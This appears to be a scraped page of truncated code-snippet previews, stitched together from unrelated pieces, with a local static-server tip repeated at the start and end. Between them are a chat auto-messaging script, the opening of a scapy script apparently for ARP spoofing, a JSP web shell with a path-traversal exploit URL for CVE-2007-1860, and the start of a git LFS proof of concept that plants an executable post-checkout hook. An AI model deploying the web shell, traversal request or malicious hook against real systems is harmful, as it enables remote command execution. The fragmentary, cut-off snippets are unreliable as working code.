Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
var timex = setInterval(sendFuckingMsg, 30000); | |
function sendFuckingMsg(){ | |
productName = "ESPN Ilimitado"; | |
uolPersonName = document.getElementById("Span1").textContent; | |
textField = document.getElementById("message"); | |
button = document.getElementsByClassName("vinter-button vinter-quest-btnSend")[0]; | |
textField.value = "Oi" + uolPersonName + "Não estou interessado. Quero CANCELAR o " + productName + "!"; | |
button.click(); | |
} |
import os | |
import sys | |
import threading | |
import signal | |
from scapy.all import * | |
HWDST_SRC = "ff:ff:ff:ff:ff:ff" | |
interface = "" | |
target_ip = "" |
# how to use | |
# build | |
# $ jar -cvf index.war * | |
# upload to tomacat server | |
# execute | |
# http://taget/%252e%252e/%252e%252e/cve-2007-1860/index.jsp?cmd=ls | |
<FORM METHOD=GET ACTION='index.jsp'> | |
<INPUT name='cmd' type=text> |
#!/bin/sh | |
git init delayed-checkout && | |
( | |
cd delayed-checkout && | |
echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \ | |
>.gitattributes && | |
mkdir A && | |
printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout && | |
chmod +x A/post-checkout && |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000